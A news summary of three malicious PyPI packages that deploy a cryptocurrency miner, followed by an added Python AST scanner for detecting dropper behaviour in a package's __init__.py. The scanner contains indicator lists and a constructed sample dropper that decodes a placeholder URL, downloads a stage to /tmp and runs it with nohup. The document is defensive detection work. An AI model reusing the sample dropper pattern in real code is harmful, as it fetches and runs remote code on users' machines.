An anonymous reader shared this report from The Hacker News:
Three new malicious packages have been found in the Python Package Index (PyPI) open-source repository with capabilities to deploy a cryptocurrency miner on affected Linux devices.
The three malicious packages, named modularseven, driftme, and catme, attracted a total of 431 downloads over the past month before they were taken down…
The malicious code resides in the __init__.py file, which decodes and retrieves the first stage from a remote server, a shell script ("unmi.sh") that fetches a configuration file for the mining activity as well as the CoinMiner file hosted on GitLab. The ELF binary is then executed in the background using the nohup command, thus ensuring that the process continues to run even after exiting the session. "Echoing the approach of the earlier 'culturestreak' package, these packages conceal their payload, effectively reducing the detectability of their malicious code by hosting it on a remote URL," said Fortinet FortiGuard Labs researcher Gabby Xiong. "The payload is then incrementally released in various stages to execute its malicious actions."
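The behaviour described above (an `__init__.py` that decodes an embedded blob, fetches a remote first stage and launches something in the background with `nohup`) has a recognisable static shape that a defender can triage for before a package is installed. The following scanner is an added example written for this summary; it is not code from the article, from Fortinet, or from the packages named. It walks the AST of a package's `__init__.py`, resolves import aliases so that `import subprocess as sp` does not hide a `Popen` call, and reports which of the three behaviours (decode, fetch, execute) plus supporting string indicators are present. The two sample `__init__.py` sources embedded at the bottom are constructed for the demonstration (the "suspicious" one uses a placeholder `example.invalid` URL) and are only parsed, never executed.

```python
"""Static triage of a Python package's __init__.py for dropper-style behaviour.

Added example, not from the article or from Fortinet. The indicator lists and
the scoring rule are assumptions chosen for illustration, not a vendor's rules.
"""
import ast
import base64
from pathlib import Path

# Fully qualified call names grouped by the behaviour they indicate (assumed list).
INDICATORS = {
    "decode": {"base64.b64decode", "codecs.decode", "zlib.decompress", "bytes.fromhex"},
    "fetch": {"urllib.request.urlopen", "urllib.request.urlretrieve",
              "requests.get", "socket.create_connection"},
    "execute": {"subprocess.Popen", "subprocess.run", "subprocess.call",
                "os.system", "os.popen", "exec", "eval"},
}
# Substrings in string literals that often accompany a background dropper.
SUSPICIOUS_STRINGS = ("nohup", "chmod +x", "/tmp/")


def _dotted(expr):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    if isinstance(expr, ast.Name):
        return expr.id
    if isinstance(expr, ast.Attribute):
        base = _dotted(expr.value)
        return f"{base}.{expr.attr}" if base else None
    return None


class _Visitor(ast.NodeVisitor):
    """Collects resolved call names and string literals from a module."""

    def __init__(self):
        self.aliases = {}   # local name -> fully qualified module/attribute
        self.calls = set()
        self.strings = []

    def visit_Import(self, node):
        for a in node.names:
            if a.asname:
                self.aliases[a.asname] = a.name          # import x.y as z
            else:
                root = a.name.split(".")[0]              # import x.y binds 'x'
                self.aliases[root] = root

    def visit_ImportFrom(self, node):
        for a in node.names:                             # from x import y as z
            self.aliases[a.asname or a.name] = f"{node.module}.{a.name}"

    def visit_Call(self, node):
        name = _dotted(node.func)
        if name:
            root, _, rest = name.partition(".")
            resolved = self.aliases.get(root, root)
            self.calls.add(resolved + ("." + rest if rest else ""))
        self.generic_visit(node)

    def visit_Constant(self, node):
        if isinstance(node.value, str):
            self.strings.append(node.value)


def _looks_like_base64(s):
    """True for long literals that decode cleanly as base64 (embedded blobs)."""
    if len(s) < 40 or " " in s:
        return False
    try:
        base64.b64decode(s, validate=True)
        return True
    except ValueError:
        return False


def analyze(source):
    """Return per-category hits, a score and a verdict for one module's source."""
    v = _Visitor()
    v.visit(ast.parse(source))
    hits = {cat: sorted(v.calls & names) for cat, names in INDICATORS.items()}
    hits["strings"] = sorted({s for s in v.strings
                              for m in SUSPICIOUS_STRINGS if m in s})
    hits["blob"] = [s for s in v.strings if _looks_like_base64(s)]
    present = [c for c in ("decode", "fetch", "execute", "strings", "blob") if hits[c]]
    hits["score"] = len(present)
    # Assumed rule: fetch + execute together, or three or more behaviours, is enough to flag.
    flagged = ("fetch" in present and "execute" in present) or len(present) >= 3
    hits["verdict"] = "suspicious" if flagged else "benign"
    return hits


def scan_package(root):
    """Analyze every __init__.py under an unpacked sdist/wheel directory."""
    return {str(p): analyze(p.read_text()) for p in Path(root).rglob("__init__.py")}


# Constructed samples for the demonstration (parsed only, never executed).
BENIGN = '''
"""A harmless package."""
import json
from pathlib import Path

__version__ = "1.0.0"

def load_config(path):
    return json.loads(Path(path).read_text())
'''

_BLOB = base64.b64encode(b"https://example.invalid/stage1.sh").decode()  # placeholder URL
SUSPICIOUS = f'''
import base64
import subprocess as sp
from urllib.request import urlopen

_u = base64.b64decode("{_BLOB}").decode()
open("/tmp/stage1.sh", "wb").write(urlopen(_u).read())
sp.Popen(["nohup", "sh", "/tmp/stage1.sh"])
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, analyze(src))
```

Run it against an unpacked sdist with `scan_package("path/to/unpacked")` before installing, or hook `analyze` into a pre-install review step. The aliasing resolution is the part that matters in practice: string-matching for `subprocess` alone misses `import subprocess as sp`, while the AST walk reports the resolved `subprocess.Popen` regardless of how the module was imported.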